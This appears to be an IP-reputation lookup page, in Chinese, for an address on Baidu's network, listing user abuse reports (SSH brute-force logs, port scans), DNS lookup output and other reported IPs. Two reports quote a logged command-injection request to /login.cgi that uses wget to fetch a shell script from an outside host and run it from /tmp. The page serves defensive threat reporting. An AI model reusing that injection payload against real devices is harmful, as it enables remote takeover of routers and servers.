106.12.45.23 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): China

运营商(isp): Beijing Baidu Netcom Science and Technology Co. Ltd.

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Search Engine Spider

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attack	MultiHost/MultiPort Probe, Scan, Hack -	2019-07-18 19:15:48
attack	106.12.45.23 - - [17/Jul/2019:18:24:52 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.93.159/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0" ...	2019-07-18 07:08:31
attackspambots	106.12.45.23 - - [11/Jul/2019:05:58:42 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.93.159/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0" ...	2019-07-11 14:03:00
attack	firewall-block_invalid_GET_Request	2019-07-05 09:17:38
attackspambots	scan z	2019-06-26 02:05:51

相同子网IP讨论:

IP	类型	评论内容	时间
106.12.45.32	attackspam	Sep 20 06:01:31 s158375 sshd[25400]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.32	2020-09-20 21:37:09
106.12.45.32	attackspambots	firewall-block, port(s): 21513/tcp	2020-09-20 13:31:50
106.12.45.32	attackspam	Port scan: Attack repeated for 24 hours	2020-09-20 05:31:27
106.12.45.110	attack	Sep 14 04:48:16 cho sshd[2864902]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 14 04:48:16 cho sshd[2864902]: Invalid user kawarada from 106.12.45.110 port 48496 Sep 14 04:48:18 cho sshd[2864902]: Failed password for invalid user kawarada from 106.12.45.110 port 48496 ssh2 Sep 14 04:49:59 cho sshd[2864959]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 user=root Sep 14 04:50:01 cho sshd[2864959]: Failed password for root from 106.12.45.110 port 40780 ssh2 ...	2020-09-14 17:28:18
106.12.45.110	attack	2020-09-13T13:58:31.788689yoshi.linuxbox.ninja sshd[3254858]: Failed password for root from 106.12.45.110 port 35694 ssh2 2020-09-13T14:00:43.409872yoshi.linuxbox.ninja sshd[3256329]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 user=root 2020-09-13T14:00:45.844988yoshi.linuxbox.ninja sshd[3256329]: Failed password for root from 106.12.45.110 port 38064 ssh2 ...	2020-09-14 03:14:29
106.12.45.110	attack	Sep 13 01:05:59 web1 sshd\[23350\]: Invalid user ubnt from 106.12.45.110 Sep 13 01:05:59 web1 sshd\[23350\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 13 01:06:01 web1 sshd\[23350\]: Failed password for invalid user ubnt from 106.12.45.110 port 50406 ssh2 Sep 13 01:12:24 web1 sshd\[23888\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 user=root Sep 13 01:12:25 web1 sshd\[23888\]: Failed password for root from 106.12.45.110 port 55278 ssh2	2020-09-13 19:13:02
106.12.45.110	attackbots	Sep 10 10:17:48 vps46666688 sshd[19570]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 10 10:17:49 vps46666688 sshd[19570]: Failed password for invalid user gentry from 106.12.45.110 port 58934 ssh2 ...	2020-09-10 23:56:32
106.12.45.110	attackspambots	Sep 10 07:10:55 jumpserver sshd[17533]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 10 07:10:55 jumpserver sshd[17533]: Invalid user rtkit from 106.12.45.110 port 53434 Sep 10 07:10:57 jumpserver sshd[17533]: Failed password for invalid user rtkit from 106.12.45.110 port 53434 ssh2 ...	2020-09-10 15:21:09
106.12.45.110	attackspambots	Sep 9 21:10:43 mout sshd[20456]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 user=root Sep 9 21:10:44 mout sshd[20456]: Failed password for root from 106.12.45.110 port 58562 ssh2	2020-09-10 05:57:23
106.12.45.32	attackbotsspam	firewall-block, port(s): 2167/tcp	2020-09-08 00:16:42
106.12.45.32	attackbots	ET CINS Active Threat Intelligence Poor Reputation IP group 97 - port: 2167 proto: tcp cat: Misc Attackbytes: 60	2020-09-07 15:48:38
106.12.45.32	attackspam	Port Scan ...	2020-09-07 08:10:34
106.12.45.110	attack	Sep 1 05:50:14 ns382633 sshd\[5643\]: Invalid user test from 106.12.45.110 port 42682 Sep 1 05:50:14 ns382633 sshd\[5643\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 1 05:50:16 ns382633 sshd\[5643\]: Failed password for invalid user test from 106.12.45.110 port 42682 ssh2 Sep 1 05:54:16 ns382633 sshd\[5932\]: Invalid user tom from 106.12.45.110 port 58056 Sep 1 05:54:16 ns382633 sshd\[5932\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110	2020-09-01 13:49:33
106.12.45.110	attackbots	Aug 31 15:03:41 abendstille sshd\[6274\]: Invalid user atul from 106.12.45.110 Aug 31 15:03:41 abendstille sshd\[6274\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Aug 31 15:03:44 abendstille sshd\[6274\]: Failed password for invalid user atul from 106.12.45.110 port 35992 ssh2 Aug 31 15:07:37 abendstille sshd\[10099\]: Invalid user xavier from 106.12.45.110 Aug 31 15:07:37 abendstille sshd\[10099\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 ...	2020-08-31 23:08:27
106.12.45.32	attackspam	Port scan denied	2020-08-30 03:08:46

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 106.12.45.23
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 29902
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;106.12.45.23.			IN	A

;; AUTHORITY SECTION:
.			2099	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019062501 1800 900 604800 86400

;; Query time: 1 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Wed Jun 26 02:05:43 CST 2019
;; MSG SIZE  rcvd: 116

HOST信息:

Host 23.45.12.106.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		67.207.67.2
Address:	67.207.67.2#53

** server can't find 23.45.12.106.in-addr.arpa: NXDOMAIN

IP	类型	评论内容	时间
192.241.235.20	attack	firewall-block, port(s): 3306/tcp	2020-03-03 19:16:19
185.202.1.185	attackspambots	RDP Bruteforce	2020-03-03 19:34:45
5.249.164.66	attack	Attempted Brute Force (dovecot)	2020-03-03 19:17:20
183.87.42.127	attackbots	Email rejected due to spam filtering	2020-03-03 19:25:36
188.120.244.60	attack	2020-03-03T04:28:46.049977suse-nuc sshd[20093]: Invalid user honda from 188.120.244.60 port 60586 ...	2020-03-03 19:41:04
114.37.174.104	attack	Email rejected due to spam filtering	2020-03-03 19:24:35
222.186.15.166	attackbotsspam	Mar 3 11:56:13 MK-Soft-VM7 sshd[19783]: Failed password for root from 222.186.15.166 port 46979 ssh2 Mar 3 11:56:16 MK-Soft-VM7 sshd[19783]: Failed password for root from 222.186.15.166 port 46979 ssh2 ...	2020-03-03 19:08:55
79.101.59.104	attackbotsspam	GPON Home Routers Remote Code Execution Vulnerability CVE 2018-10562, PTR: 79.101.59.104.wifi.dynamic.gronet.rs.	2020-03-03 19:02:12
92.63.194.59	attackspam	2020-03-02 UTC: (2x) - admin(2x)	2020-03-03 19:15:45
51.75.25.12	attack	Mar 3 03:57:53 server sshd\[21070\]: Failed password for invalid user nx from 51.75.25.12 port 55420 ssh2 Mar 3 10:02:34 server sshd\[23042\]: Invalid user sinusbot1 from 51.75.25.12 Mar 3 10:02:34 server sshd\[23042\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=mail.hugo-benchetrit.fr Mar 3 10:02:36 server sshd\[23042\]: Failed password for invalid user sinusbot1 from 51.75.25.12 port 57082 ssh2 Mar 3 10:11:09 server sshd\[24607\]: Invalid user gzw from 51.75.25.12 ...	2020-03-03 19:41:38
79.3.6.207	attack	Brute-force attempt banned	2020-03-03 19:02:44
103.139.34.143	attack	Email rejected due to spam filtering	2020-03-03 19:38:33
27.77.229.138	attackspam	Telnet/23 MH Probe, Scan, BF, Hack -	2020-03-03 19:12:54
106.75.15.142	attackbots	$f2bV_matches	2020-03-03 19:38:12
138.68.146.111	attackbotsspam	xmlrpc.php attack	2020-03-03 19:11:35

最近上报的IP列表

113.121.240.246	196.64.167.5	180.120.192.147	198.143.179.66
95.177.162.153	159.100.24.10	62.133.162.255	114.232.219.221
42.110.202.227	121.226.127.171	195.189.141.50	121.226.62.147
188.166.254.118	202.254.236.13	172.104.172.12	37.142.4.186
192.145.239.52	80.211.3.175	52.249.205.53	93.65.245.164